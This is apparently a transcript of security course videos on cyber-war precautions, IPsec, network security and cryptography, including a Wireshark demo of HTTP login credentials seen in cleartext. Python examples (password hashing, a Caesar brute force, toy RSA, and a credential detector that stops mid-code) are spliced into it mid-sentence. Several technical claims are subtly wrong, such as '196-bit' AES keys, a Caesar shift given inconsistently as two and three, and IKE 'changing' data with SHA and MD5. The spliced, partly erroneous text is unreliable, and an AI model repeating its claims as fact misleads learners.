But what are some of the ways we as citizens can protect ourselves in the case of a cyber war? In the unfortunate event that your country is involved in a war, be sure to fact-check every piece of information and follow only trusted sources during that period. Even online conversations should be limited to a need-to-know basis, considering that propaganda campaigns have the power to influence the tide of war drastically. It is highly crucial to follow basic security guidelines to secure our devices.
This means regularly updating our operating systems and occasionally running full-system antivirus scans. If your country or organization is being attacked, keeping devices segregated on the network goes a long way in bolstering security. Try to avoid sharing a lot of personal data online: in this era of Instagram and Facebook, divulging private information can be detrimental to keeping your data secure, since the more information an attacker has, the higher the chance of devising a plan to infiltrate your defenses.

During data transmission there are various external factors which can affect the data sent over a network channel, such as eavesdropping, tampering and replay. To prevent such cases we use Internet Protocol Security, which we'll be discussing in this session on IPsec. Let's take a look at the agenda. To begin with we will look at what IPsec is, continuing with why we use IPsec in a network, followed by the components of IPsec and the modes of IP security, and as the last topic we will look at the working steps involved in IPsec.

Let's begin with the first heading, what IPsec is. IPsec, Internet Protocol Security, is defined as a framework of protocols that secures data transmission over a network at the IP layer.
of two main protocols for data security over a network channel: the Authentication Header, which is responsible for data integrity and anti-replay services, and Encapsulating Security Payload, in short ESP, which includes data encryption and data authentication.

Now let's move on to the next heading, that is, why do we use IPSec in a network? IPSec is used to secure sensitive data and information such as company data, clinical data, bank data and various sensitive information regarding an institution, which are used during data transmission over a network channel. VPNs, that is virtual private networks, apply IPSec protocols to encrypt the data for end-to-end transmission. Let's continue with why we use IPSec services. IPSec is also used to encrypt data for the application layer in the OSI model and to provide security for sharing data over network routers, along with data authentication.

Let's take a look at the working of IPSec services. To begin with, we have two different systems, system one and system two, which will establish a network channel, and then the encryption of data will take place when one host shares the data with the second host. During this, IPSec services will secure the data that is to be transferred over the network channel by applying router encryption and authentication.

Now let's move on to the next topic, that is, the components of IPSec. The IPSec services comprise multiple protocols that ensure data transmission over the network channel. The first one is the Encapsulating Security Payload protocol, in short ESP. This protocol of IP security provides data encryption and authentication services; it both authenticates and encrypts the data packet in the transmission channel. Moving on, we have the Authentication Header, in short AH. Similar to ESP, the Authentication Header also provides all the security services, but it does not encrypt the data. It also protects the IP packet and adds additional headers to the packet header. The modified IP
datagram looks this way, where the IP components are included at the second position, the seventh position and the sixth position, along with the authentication of data services over the network channel. Moving on, we have Internet Key Exchange, IKE. This protocol provides protection for content data and also changes the attributes of the original data to be shared by implementing SHA and MD5 algorithms. They also check the message for authentication, and only then is it forwarded to the receiver side. For example, this is the original data packet we are used to, with the IP header part, TCP/UDP and data, whereas this is the modified IPSec data packet, where the ESP header is added between the IP header and the TCP protocol.

Now let's move on to the next heading, that is, the modes of IPSec. There are basically two types of IPSec modes available for data transmission over the network channel. The first one is tunnel mode. This mode of transmission is used to secure gateway-to-gateway data. It is applied when the final destination of the data is to be connected to a sender site through a connection gateway over the internet. For example, we have two hosts, host A and host B. From host A we are sending a message to host B, which will pass through a gateway at host A's point and then passes through a gateway to host B. This is the basic format for gateway-to-gateway data transmission, and the given IP datagram format is used for tunnel mode.

Now let's move on to the second mode of IPSec, that is transport mode. This mode of IPSec is used to protect protocols like TCP or UDP and is used to ensure end-to-end communication. Unlike tunnel mode, transport mode adds the Authentication Header and Encapsulating Security Payload for security purposes after the IP header. This is the modified IP datagram for transport mode. The point to be noted is that the IPSec header is always added between the IP header and the TCP header.

Now let's move on to the last heading for this session on IPSec, that is, the working steps involved in IP
security. In general there are five steps involved in the working of IPSec to ensure data transmission over a network channel. The first step is host recognition: in this step the host system will check if the packet is to be transmitted or not by automatically triggering the security policy for the data, which is implemented by the sender side for proper encryption. Then the second step is known as IKE phase one. In this step the two host devices, the sender and the receiver side, will authenticate each other to establish a secure network channel. It is comprised of two modes: main mode, which provides much better security with a proper time limit, and the second mode, known as aggressive mode, which, as the name suggests, establishes the IPSec protocol much faster in comparison to main mode. Let's move on to the third step, which is IKE phase two. After the second step the hosts decide the type of cryptography algorithm to apply over the session in the network channel and the secret key for the algorithm to be used to encrypt the data for transmission. Then we have IPSec transmission. This step involves the actual transfer of data over the network channel using the various protocols used in IPSec security, which are implemented under the tunnel condition. And the last step is IPSec termination: after the completion of the data exchange or a session timeout, the IPSec tunnel is terminated and the security key established is discarded by both host systems.

Network security is a set of technologies that protects the usability and integrity of a company's infrastructure by preventing the entry or proliferation of threats within a network. Its architecture comprises tools that protect the network itself and the applications that run over it. Effective network security strategies employ multiple lines of defense that are scalable and automated. Each defensive layer here enforces a set of security policies which are determined by the administrator beforehand. This aims at securing the confidentiality and
accessibility of the data and the network. Every company or organization that handles a large amount of data has a degree of solutions against many cyber threats. The most basic example of network security is password protection, where the user chooses a password for the network. Recently, network security has become the central topic of cyber security, with many organizations inviting applications from people with skills in this area. It is crucial for both personal and professional networks. Most houses with high-speed internet have one or more wireless routers, which can be vulnerable to attacks if they're not adequately secured. Data loss, theft and sabotage risk may be decreased with the usage of a strong network security system. Workstations are protected from hazardous spyware thanks to network security. Additionally, it guarantees the security of the data which is being shared over a network by dividing information into various sections, encrypting these portions and transferring them over separate pathways. Network security infrastructure offers multiple levels of protection to thwart man-in-the-middle attacks, preventing situations like eavesdropping, among other harmful attacks. It is becoming increasingly difficult in today's hyperconnected environment as more corporate applications migrate to both public and private clouds. Additionally, modern applications are also frequently virtualized and dispersed across several locations, some outside the physical control of the IT team. Network traffic and infrastructure must be protected in these cases, since assaults on businesses are increasing every single day.

We now understand the basics of network security, but in the next section we need to understand how network security works in slightly more detail. Network security revolves around two processes: authentication and authorization. The first process, authentication, is similar to an access pass which ensures that only those who have the right to enter a building can do so. In other words,
authentication checks and verifies that it is indeed a user belonging to the network who is trying to access or enter it, thereby preventing unauthorized intrusions. Next comes authorization. This process decides the level of access provided to the recently authenticated user. For example, a network admin needs access to the entire network, whereas those working within it probably need access to only certain areas within the network. Based on the network user's role, the process of determining the level of access or permission level is known as authorization.

Today's network architecture is complex and faces a threat environment that is always changing, and attackers that are always trying to find and exploit vulnerabilities. These vulnerabilities can exist in many areas, including devices, data, applications, users and locations. For this reason many network security management tools and applications are in use today that address individual threats. When just a few minutes of downtime can cause widespread disruption and massive damage to an organization's bottom line and reputation, it is essential that these protection measures are in place beforehand.

Now that you know a little about network security and its working, let's cover the different types of network security. The fundamental tenet of network security is the layering of protection for massive networks and stored data that ensures the acceptance of rules and regulations as a whole. There are three types: the first of which is physical security, the next being technical, and the third being administrative. Let's look into physical security first. This is the most basic level, which includes protecting the data and the network from unauthorized personnel acquiring control over the confidentiality of the network. This includes external peripherals and routers that might be used for cable connections. The same can be achieved by using devices like biometric systems. Physical security is critical, especially for small businesses that do not have
many resources to devote to security personnel and tools, as opposed to large firms. When it comes to technical network security, it focuses mostly on safeguarding data either kept in the network or engaged in network transitions. This kind fulfills two functions: one is defense against unauthorized users, the other is defense against malevolent actions. The last category is administrative. This level of network security protects user behavior, like how permission has been granted and how the authorization process takes place. This also ensures the level of sophistication the network might need to protect it through all the attacks. This level also suggests necessary amendments that have to be done to the infrastructure.

I think that's all the basics that we need to cover on network security. In our next topic we're going to go through two mediums of network security, which are the transport layer and the application layer. Transport layer security is a way to secure information as it is carried over the internet, with users browsing websites, emails, instant messaging, etc. TLS aims to provide a private and secure connection between a web browser and a website server. It does this with a cryptographic handshake between two systems using public key cryptography. The two parties set up the connection and exchange a secret token, and once each machine validates this token it is used for all communications. The connection then employs lighter symmetric cryptography to save bandwidth and processing power.

Since the application layer is the closest layer to the end user, it provides hackers with the largest threat surface. Poor app layer security can lead to performance and stability issues, data theft and, in some cases, the network being taken down. Examples of application layer attacks include distributed denial of service attacks, or DDoS attacks, HTTP floods, SQL injections, cross-site scripting, etc. Most organizations have an arsenal of application layer security protections to combat these
and more, such as web application firewalls, secure web gateway services, etc.

Now that the theory behind network security has been covered in detail, let us go through some of the tools that can be used to enforce these network security policies. The first tool to be covered in this section is a firewall. A firewall is a type of network security device that keeps track of incoming and outgoing network traffic and decides which traffic to allow or deny in accordance with a set of security rules. For more than 25 years, firewalls have served as network security's first line of defense. They provide a barrier between trustworthy, internal, protected and regulated networks and shady external networks like the internet.

The next tool which can be used to bolster network security is a virtual private network, or VPN for short. It's an encrypted connection between a device and a network via the internet. The encrypted connection aids the secure transmission of sensitive data. It makes it impossible for unauthorized parties to eavesdrop on the traffic and enables remote work for the user. The usage of VPN technology is common in both corporate and personal networks.

Next we cover the importance of intrusion prevention systems, or IPS frameworks, in network security. An intrusion prevention system is a network security tool that continually scans a network for harmful activity and responds to it when it does occur by reporting, blocking or discarding it. It can be either hardware or software. It's more sophisticated than an intrusion detection system, or IDS framework, which can merely identify harmful activities and warn an administrator, while an IPS actually takes action against that activity.

The next and final tool in this section is behavioral analytics. Behavioral analytics focuses more on the statistics that are carried over and stored through months and years of usage. Once some kind of similar pattern is noted and the IT
administrator can detect some kind of attack, similar attacks can be stopped and the security can be further enhanced.

Now that we have covered all that we need to know about network security, the necessary tools it requires, its types, etc., let's go through the benefits of network security. The first is protection against external threats. The objectives for cyber assaults can be as varied as the defenders themselves, although they're typically initiated for financial gain. Whether they are industrial spies, activists or cyber criminals, these bad actors all have one thing in common, which is how quick, clever and covert their attacks are getting. A strong cyber security posture that considers routine software updates may assist firms in identifying and responding to the abuse techniques, tools and common entry points.

The next benefit is protection against internal threats. The human aspect continues to be the cyber security system's weakest link. Insider risk can originate from current or former workers, third-party vendors or even trusted partners, and it can be unintentional, careless or downright evil. Aside from that, the rapid expansion of remote work, the personal devices used for business purposes and even IoT devices in remote locations can make it easier for these kinds of threats to go undetected until it's too late. However, by proactively monitoring networks and managing access, these dangers may be identified and dealt with before they become expensive disasters.

The third benefit is increased productivity. It is nearly impossible for employees to function when networks and personal devices are slowed to a crawl by viruses and other cyber attacks during the operation of the website and the running of the company. You may significantly minimize violations and the amount of downtime required to fix a breach by implementing various cyber security measures such as enhanced firewalls, virus scanning and automatic backups. Employee identification of possible email phishing
schemes, suspicious links and other malicious criminal activities can also be aided by education and training.

Another benefit is brand trust and reputation. Customer retention is one of the most crucial elements in business development. Customers today place a premium on maintaining brand loyalty through a strong cyber security stance, since this is the fastest way to get other businesses back, get referrals and sell more tickets overall. Additionally, it helps manufacturers get on the vendor list with bigger companies as a part of the supply chain, which is only as strong as its weakest link. This opens possibilities for potential future endeavors and development.

With the rise in censorship and general fear over privacy loss, consumer security is at an all-time high risk. Technology has made our life so much easier while putting up a decent target on our personal information. It is necessary to understand how to simultaneously safeguard our data and be up to date with the latest technological developments. Maintaining this balance has become easier with cryptography taking its place in today's digital world. So hey everyone, this is Bever from Simplilearn, and welcome to this video on cryptography. But before we begin, if you love watching tech videos, subscribe to our channel and hit the bell icon to never miss an update from Simplilearn.

So here's a story to help you understand cryptography. Meet Anne. Anne wanted to look for a decent discount on the latest iPhone. She started searching on the internet and found a rather shady website that offered a 50% discount on the first purchase. Once Anne submitted her payment details, a huge chunk of money was withdrawn from her bank account just moments after. Devastated, Anne quickly realized she had failed to notice that the website was an HTTP web page instead of an HTTPS one. The payment information submitted was not encrypted, and it was visible to anyone keeping an eye, including the website owner and hackers. Had she used a reputed website which has
encrypted transactions and employs cryptography, our iPhone enthusiast could have avoided this particular incident. This is why it's never recommended to visit unknown websites or share any personal information on them.

Now that we understand why cryptography is so important, let's take a look at the topics to be covered today. We take a look into what cryptography is and how it works. We learn where cryptography is being used in our daily lives and how we are benefiting from it. Then we will understand the different types of cryptography and their respective uses. Moving on, we will look at the usage of cryptography in ancient history and a live demonstration of cryptography and encryption in action.

Let's now understand what cryptography is. Cryptography is the science of encrypting or decrypting information to prevent unauthorized access. We transform our data and personal information so that only the correct recipient can understand the message. As an essential aspect of modern data security, using cryptography allows the secure storage and transmission of data between willing parties. Encryption is the primary route for employing cryptography, by applying certain algorithms to jumble up the data. Decryption is the process of reversing the work done by encrypting information so that the data becomes readable again. Both of these methods form the basis of cryptography. For example, when "simplilearn" is jumbled up or changed in any format, not many people can guess the original word by looking at the encrypted text. The only ones who can are the people who know how to decrypt the coded word, thereby reversing the process of encryption.

Any data pre-encryption is called plain text or clear text. To encrypt the message we use certain algorithms that serve a single purpose: scrambling the data to make it unreadable without the necessary tools. These algorithms are called ciphers. They are a set of detailed steps to be carried out one after the other to make sure the data becomes as
unreadable as possible until it reaches the receiver. We take the plain text, pass it to the cipher algorithm and get the encrypted data. This encrypted text is called the cipher text, and this is the message that is transferred between the two parties. The key that is being used to scramble the data is known as the encryption key. These steps, that is the cipher and the encryption key, are made known to the receiver, who can then reverse the encryption on receiving the message. Unless any third party manages to find out both the algorithm and the secret key that is being used, they cannot decrypt the messages, since both of them are necessary to unlock the hidden content.

Wonder what else we would lose if not for cryptography? Any website where you have an account could read your passwords. Important emails could be intercepted and their contents read without encryption during transit. More than 65 billion messages are sent on WhatsApp every day, all of which are secured thanks to end-to-end encryption. There is a huge market opening up for cryptocurrency, which is possible due to blockchain technology that uses encryption algorithms and hashing functions to ensure that the data is secure. If this is of particular interest to you, you can watch our video on blockchain, the link to which will be in the description.

Of course, there is no single solution to a problem as diverse as explained. There are three variants of how cryptography works and is in practice: symmetric encryption, asymmetric encryption and hashing. Let's find out how much we have understood until now. Do you remember the difference between a cipher and cipher text? Leave your answers in the comments. And before we proceed, if you find this video interesting, make sure to give it a thumbs up.

Before moving ahead, let's look at symmetric encryption first. Symmetric encryption uses a single key for both the encryption and decryption of data. It is comparatively less secure than asymmetric encryption but much faster. It is
a compromise that has to be embraced in order to deliver data as fast as possible without leaving information completely vulnerable. This type of encryption is used when data rests on servers and identifies personnel for payment applications and services. The potential drawback with symmetric encryption is that both the sender and receiver need to have the same secret key, and it should be kept hidden at all times. The Caesar cipher and the Enigma machine are both symmetric encryption examples that we will look into further. For example, if Alice wants to send a message to Bob, she can apply a substitution cipher or a shift cipher to encrypt the message, but Bob must be aware of the same key so he can decrypt it when he finds it necessary to read the entire message.

Symmetric encryption uses one of two types of ciphers: stream ciphers and block ciphers. Block ciphers break the plain text into blocks of fixed size and use the key to convert it into cipher text. Stream ciphers convert the plain text into cipher text one bit at a time instead of breaking it up into bigger chunks. In today's world the most widely used symmetric encryption algorithm is AES-256, which stands for Advanced Encryption Standard, with a key size of 256 bits, with 128-bit and 196-bit key sizes also being available. Other primitive algorithms like the Data Encryption Standard (DES), the Triple Data Encryption Standard (3DES) and Blowfish have all fallen out of favor due to the rise of AES. AES chops up the data into blocks and performs 10 or more rounds of obscuring and substituting the message to make it unreadable.

Asymmetric encryption, on the other hand, has a double whammy at its disposal. There are two different keys at play here: a public key and a private key. The public key is used to encrypt information pre-transit, and a private key is used to decrypt the information post-transit. If Alice wants to communicate with Bob using asymmetric encryption, she encrypts the message using Bob's public key.
After receiving the message, Bob uses his own private key to decrypt the data. This way nobody can intercept the message in between transmissions, and there is no need for any secure key exchange for this to work, since the encryption is done with a public key and the decryption is done with a private key that no one except Bob has access to. Both keys are necessary to read the full message. There is also a reverse scenario where we can use a private key for encryption and the public key for decryption. A server can sign non-confidential information using its private key, and anyone who has its public key can decrypt the message. This mechanism also proves that the sender is authenticated and there is no problem with the origin of the information.

RSA encryption is the most widely used asymmetric encryption standard. It is named after its founders Rivest, Shamir and Adleman, and it uses block ciphers that separate the data into blocks and obscure the information. Widely considered the most secure form of encryption, albeit relatively slower than AES, it is widely used in web browsing, secure identification, VPNs, emails and chat applications.

With so much hanging on the key's secrecy, there must be a way to transmit the keys without others reading our private data. Many systems use a combination of symmetric encryption and asymmetric encryption to bolster security and match speed at the same time. Since asymmetric encryption takes longer to decrypt large amounts of data, the full information is encrypted using a single key, that is symmetric encryption; that single key is then transmitted to the receiver using asymmetric encryption, so you don't have to compromise either way. Another route is using the Diffie-Hellman key exchange, which relies on a one-way function and is much tougher to break into.

The third variant of cryptography is termed hashing. Hashing is a process of scrambling a piece of data beyond recognition. It gives an output of fixed size, which is known as the hash value of the
original data, or just the hash in general. The calculations that do the job of messing up the data form the hash function. They are generally not reversible without resilient brute force mechanisms and are very helpful when storing data on website servers that need not be stored in plain text. For example, many websites store your account passwords in a hashed format so that not even the administrator can read your credentials. When a user tries to log in, they can compare the entered password's hash value with the hash value that is already stored on the servers for authentication, since the function will always return the same value for the same input.

Cryptography has been in practice for centuries. Julius Caesar used a substitution shift to move letters a certain number of spaces beyond their place in the alphabet table, so a spy can't decipher the original message at first glance. For example, if he wanted to pass confidential information to his armies and decided to use a substitution shift of plus two, A becomes C, B becomes D, and so on. The word "attack", when passed through a substitution shift of plus three, becomes "dwwdfn". This cipher has been appropriately named the Caesar cipher, which is one of the most widely used algorithms.

The Enigma is probably the most famous cryptographic cipher device used in ancient history. It was used by the Nazi German armies in the World Wars. They were used to protect confidential political, military and administrative information, and it consisted of three or more rotors that scrambled the original message depending on the machine state at that time. The decryption is similar, but it needs both machines to stay in the same state before passing the cipher text so that we receive the same plain text message.

Let's take a look at how our data is protected while we browse the internet thanks to cryptography. Here we have a web-based tool that will help us understand the process of RSA encryption. We see the entire workflow, from selecting the key
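The password-hashing scheme described above (store only the hash, recompute on login), written out as an added example that is not from the video; it uses only the Python standard library, and the user record is constructed for illustration.

```python
# Added example, not from the video: how a server stores passwords as salted
# hashes and checks a login against them, using only the Python standard library.
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 100_000   # work factor: slows down guessing against a stolen table


def hash_password(password: str, salt: Optional[bytes] = None) -> dict:
    """Return the record a server stores: a random per-user salt and the
    PBKDF2-SHA256 hash, never the password itself."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt.hex(), "hash": digest.hex()}


def verify_password(password: str, record: dict) -> bool:
    """Recompute with the stored salt and compare in constant time. The hash
    function is deterministic, so the right password reproduces the stored hash."""
    salt = bytes.fromhex(record["salt"])
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(digest.hex(), record["hash"])


# Constructed user table; even the administrator sees only salt and hash here.
USERS = {"anne": hash_password("correct horse battery staple")}


def login(username: str, password: str) -> bool:
    """Authenticate a login attempt against the stored records."""
    record = USERS.get(username)
    if record is None:
        hash_password(password)   # same cost for unknown users (no timing hint)
        return False
    return verify_password(password, record)


if __name__ == "__main__":
    print(USERS["anne"])                                   # salt + hash only
    print(login("anne", "correct horse battery staple"))   # True
    print(login("anne", "guess"))                          # False
```

Because each user gets a fresh salt, two users with the same password still get different hashes, so a stolen table cannot be attacked with one precomputed lookup.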
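The Caesar shift from the paragraph above, as an added example (not code from the video): it reproduces the "attack" to "dwwdfn" shift of plus three, and also runs the exhaustive key search that shows why a 26-key cipher gives no real protection against the brute-force attacks mentioned earlier.

```python
# Added example, not from the video: the Caesar shift cipher and the exhaustive
# search over all 26 shifts that breaks it without knowing the key.
import string

ALPHABET = string.ascii_lowercase


def caesar_encrypt(plain: str, shift: int) -> str:
    """Move every letter `shift` places forward (wrapping past z); other
    characters are passed through unchanged."""
    out = []
    for ch in plain:
        if ch.isalpha():
            base = "a" if ch.islower() else "A"
            out.append(chr((ord(ch) - ord(base) + shift) % 26 + ord(base)))
        else:
            out.append(ch)
    return "".join(out)


def caesar_decrypt(cipher: str, shift: int) -> str:
    """Same key, reversed: decryption is a shift by -shift."""
    return caesar_encrypt(cipher, -shift)


def brute_force(cipher: str, crib: str):
    """Try every possible key and keep the shifts whose plaintext contains a
    known word (`crib`). With only 26 keys this costs nothing, which is why a
    secret key alone is not enough: the key space must be large."""
    hits = []
    for shift in range(len(ALPHABET)):
        candidate = caesar_decrypt(cipher, shift)
        if crib in candidate:
            hits.append((shift, candidate))
    return hits


if __name__ == "__main__":
    ct = caesar_encrypt("attack", 3)
    print(ct)                          # dwwdfn
    print(caesar_decrypt(ct, 3))       # attack
    print(brute_force(ct, "attack"))   # [(3, 'attack')]
```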
size to be used until the decryption of the cipher text in order to get the plain text back. As we already know, the RSA encryption algorithm falls under the umbrella of asymmetric key cryptography. That basically implies that we have two keys at play here: a public key and a private key. Typically the public key is used by the sender to encrypt the message and the private key is used by the receiver to decrypt the message. There are some occasions when this allocation is reversed, and we will have a look at them as well.

In RSA we have the choice of key size. We can select any key from 512-bit to 1024-bit, all the way up to a 4096-bit key. The longer the key length, the more complex the encryption process becomes, thereby strengthening the cipher text, although with the added security, more complex functions take longer to perform the same operations on a similar size of data. We have to keep a balance between both speed and strength, because the strongest encryption algorithms are of no use if they cannot be practically deployed on systems around the world. Let's take a 1024-bit key over here.

Now we need to generate the keys. This generation is done by functions that operate on passphrases; the tool we are using right now generates pseudo-random keys to be used in this explanation. Once we generate the keys, you can see the public key is rather smaller than the private key, which is almost always the case. These two keys are mathematically linked with each other. They cannot be substituted with any other key, and in order to encrypt the original message or decrypt the cipher text this pair must be kept together. The public key is then sent to the sender, and the receiver keeps the private key with himself in this scenario.

Let's try and encrypt the words "simply learn". We have to select whether the key being used for encryption is private or public, since that affects the process of scrambling the information. Since we are using the public key over here, let's select the same, copy it and paste it
over here. The cipher we are using right now is plain RSA. There are some modified ciphers with their own pros and cons that can also be used, provided we use them on a regular basis and depending on the use case as well. Once we click on encrypt, we can see the cipher text being generated over here. The pseudo-random generating functions are created in such a way that a single character change in the plain text will trigger a completely different cipher text. This is a security feature to strengthen the process against brute force methods.

Now that we are done with the encryption process, let's take a look at the decryption part. The receiver gets this cipher text from the sender with no other key or supplement; he or she must already possess the private key generated from the same pair. No other private key can be used to decrypt the message, since they are mathematically linked. We paste the private key here and select the same. The cipher must always be the same as the one used during the encryption process. Once we click decrypt, you can see the original plain text we had decided to encrypt. This sums up the entire process of RSA encryption and decryption.

Now, some people use it the other way around. We also have the option of using the private key to encrypt information and the public key to decrypt it. This is done mostly to validate the origin of the message, since the keys only work in pairs. If a different private key is used to encrypt the message, the public key cannot decrypt it. Conversely, if the public key is able to decrypt the message, it must have been encrypted with the right private key, and hence by the rightful owner. Here we just have to take the private key and use that to encrypt the plain text, and select the same in this checkbox as well. You can see we have generated a completely new cipher text. This cipher text will be sent to the receiver, and this time we will use the public key for decryption. Let's select the correct checkbox and decrypt, and we still get the same output.

Now let's
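The two RSA uses walked through above (public key encrypts, private key decrypts; and the reverse, private key "signs", public key checks the origin), as an added example that is not the video's web tool: textbook RSA on toy-sized primes, with the primes, message and key names chosen here for illustration.

```python
# Added example, not the video's web tool: textbook RSA on toy-sized primes to
# show the public/private pairing and its reverse use for checking origin.
from math import gcd


def generate_keypair(p: int, q: int, e: int = 17):
    """Build an RSA keypair from two primes. Toy sizes for illustration only:
    real keys use 1024- to 4096-bit moduli plus padding (OAEP for encryption,
    PSS for signatures), which plain 'textbook' RSA lacks."""
    n = p * q
    phi = (p - 1) * (q - 1)              # Euler's totient of n
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)                  # private exponent: e*d == 1 (mod phi)
    return (e, n), (d, n)                # (public key, private key)


def rsa_apply(key, values):
    """Apply x -> x^exp mod n to each integer block (each block must be < n)."""
    exp, n = key
    return [pow(v, exp, n) for v in values]


def encrypt(public_key, plaintext: str):
    """Sender side: scramble with the receiver's public key, one byte per block."""
    return rsa_apply(public_key, plaintext.encode())


def decrypt(private_key, blocks):
    """Receiver side: undo with the private key. A key from a different pair
    yields garbage (often values that are not even bytes), reported as None."""
    values = rsa_apply(private_key, blocks)
    if any(v > 255 for v in values):
        return None
    return bytes(values).decode(errors="replace")


def sign(private_key, message: str):
    """Reverse use: the owner applies the private key to the message."""
    return rsa_apply(private_key, message.encode())


def verify(public_key, message: str, signature):
    """Anyone holding the public key can undo the private-key operation; if the
    result matches the message, it was produced by the matching private key."""
    return rsa_apply(public_key, signature) == list(message.encode())


if __name__ == "__main__":
    pub, priv = generate_keypair(61, 53)        # n = 3233, d = 2753
    ct = encrypt(pub, "simply learn")
    print(ct, decrypt(priv, ct))
    other_pub, other_priv = generate_keypair(97, 89)
    print(decrypt(other_priv, ct))              # wrong pair: not the plaintext
    sig = sign(priv, "hello")
    print(verify(pub, "hello", sig), verify(other_pub, "hello", sig))
```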
take a look at a practical example of encryption in the real world. We all use the internet on a daily basis, and many are aware of the implications of using unsafe websites. Let's take a look at Wikipedia here, a pretty standard HTTPS website, where the S stands for secure. Let's take a look at how it secures that data. Wireshark is the world's foremost and most widely used network protocol analyzer. It lets you see what's happening on your network at a microscopic level, and we are going to use the software to see the traffic that is leaving our machine and to understand how vulnerable it is. Since there are many applications running on this machine, let's apply a filter that will only show us the results related to Wikipedia. Let's search for something that we can navigate the website with. Okay, once we get into it a little, you can see some of the requests being populated over here. Let's take a look at a specific request. These are the data packets that basically transport the data from our machine to the internet and vice versa. As you can see, there's a bunch of gibberish data here that doesn't really reveal anything that we searched or watched. Similarly, other secured websites function the same way, and it is very difficult, if at all possible, to snoop on user data this way.

To put this in perspective, let's take a look at another website, which is an HTTP web page. This has no encryption enabled from the server end, which makes it vulnerable to attacks. There is a login form here which needs legitimate user credentials in order to grant access. Let's enter a random pair of credentials. These obviously won't work, but we can see the manner of data transfer. Unsurprisingly, we weren't able to get into the platform. Instead we can see the data packets. Let's apply a similar filter that will help us understand what requests this website is sending. These are the requests being sent by the HTTP login form to the internet. If we check here, you see whatever username and password that we are
entering, we can easily see it with Wireshark. Now, we used a dummy pair of credentials; if we select the right data packet, we can find the correct credentials. If any website had asked for payment information or legitimate credentials, it would have been really easy to get a hold of these. To reiterate what we have already learned, you must always avoid HTTP websites, and unknown or untrustworthy websites in general, because the problem we saw here is just the tip of the iceberg. Even though cryptography has managed to lessen the risk of cyber attacks, it is still prevalent, and we should always be alert to keep ourselves safe online.

There are two types of encryption in cryptography: symmetric key cryptography and asymmetric key cryptography. Both of these categories have their pros and cons and differ only by the implementation. Today we are going to focus exclusively on symmetric key cryptography. Let us have a look at its applications in order to understand its importance better. This variant of cryptography is primarily used in banking applications, where personally identifiable information needs to be encrypted. With so many aspects of banking moving onto the internet, having a reliable safety net is crucial. Symmetric cryptography helps in detecting bank fraud and boosts the security index of these payment gateways in general. They are also helpful in protecting data that is not in transit and rests on servers and data centers. These centers house a massive amount of data that needs to be encrypted with a fast and efficient algorithm, so that when the data needs to be recalled by the respective service there is the assurance of minor to no delay. While browsing the internet, we need symmetric encryption to browse secure HTTPS websites so that we get all-around protection. It plays a significant role in verifying website server authenticity, exchanging the necessary encryption keys required, and generating a session using those keys to ensure maximum security. This helps us
in preventing the rather insecure HTTP website format.

So let us understand how symmetric key cryptography works first, before moving on to the specific algorithms. Symmetric key cryptography relies on a single key for the encryption and decryption of information. Both the sender and receiver of the message need to have a pre-shared secret key that they will use to convert the plain text into cipher text and vice versa. As you can see in the image, the key used for encryption is the same key needed for decrypting the message at the other end. The secret key shouldn't be sent along with the cipher text to the receiver, because that would defeat the entire purpose of using cryptography. Key exchange can be done beforehand using other algorithms, like the Diffie-Hellman key exchange protocol, for example. For example, if Paul wants to send a simple message to Jane, they need to have a single encryption key that both of them must keep secret to prevent snooping by malicious actors. It can be generated by either one of them, but must belong to both of them before the messages start flowing. Suppose the message "I am ready" is converted into cipher text using a specific substitution cipher by Paul; in that case, Jane must also be aware of the substitution shift to decrypt the cipher text once it reaches her. Irrespective of the scenario where someone manages to grab the cipher text mid-transit to try and read the message, not having the secret key renders everyone looking to snoop in helpless. Symmetric key algorithms like the Data Encryption Standard have been in use since the 1970s, while the popular ones like AES have become the industry standard today. With the entire architecture of symmetric cryptography depending on the single key being used, you can understand why it's of paramount importance to keep it secret on all occasions. The side effect of having a single key for the encryption and decryption is that it becomes a single point of failure. Anyone who gets their hands on it can read
all the encrypted messages, and do so mainly without the knowledge of the sender and the receiver. So it is the priority to keep the encryption and decryption key private at all times. Should it fall into the wrong hands, the third party can send messages to either the sender or the receiver using the same key to encrypt the message; upon receiving the message and decrypting it with the key, it is impossible to guess its origin. If the sender somehow
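The Wireshark comparison above (opaque HTTPS packets versus a readable HTTP login form) is the kind of thing a defender wants to catch automatically. The following is an added example, not code from the video: a small analyser over captured TCP payloads that reports HTTP form or JSON posts carrying password-like fields in the clear. The captures, addresses and field names are constructed for the example; TLS records are simply opaque bytes to it, which is exactly what the HTTPS capture looked like, and the detector keeps only field names, never the submitted values.

```python
"""Spot credential submissions that cross the wire in cleartext.

Added example (not from the video): cleartext HTTP requests are parsed and
POSTs whose form-encoded or JSON body names a password-like field are
reported.  Everything below (addresses, hosts, bodies) is constructed.
"""
import json
from dataclasses import dataclass
from urllib.parse import parse_qs

CREDENTIAL_FIELDS = {"password", "passwd", "pwd", "pass", "pin", "cvv", "card_number"}


@dataclass
class Finding:
    dst: str
    dst_port: int
    path: str
    fields: tuple          # names only; values are never retained


def parse_http_request(payload: bytes):
    """Return (method, path, headers, body) for a cleartext HTTP request,
    or None if the payload is not one (binary/TLS data falls out here)."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None
    head, _, body = text.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers, body


def submitted_field_names(content_type: str, body: str):
    """Field names in a form-encoded or JSON body; None for other types."""
    if "x-www-form-urlencoded" in content_type:
        return set(parse_qs(body, keep_blank_values=True))
    if "json" in content_type:
        try:
            return set(json.loads(body))
        except (ValueError, TypeError):
            return None
    return None


def find_cleartext_credentials(packets) -> list:
    """packets: iterable of (dst_ip, dst_port, tcp_payload)."""
    findings = []
    for dst, port, payload in packets:
        request = parse_http_request(payload)
        if request is None:
            continue
        method, path, headers, body = request
        if method != "POST":
            continue
        names = submitted_field_names(headers.get("content-type", ""), body)
        if not names:
            continue
        hits = tuple(sorted(names & CREDENTIAL_FIELDS))
        if hits:
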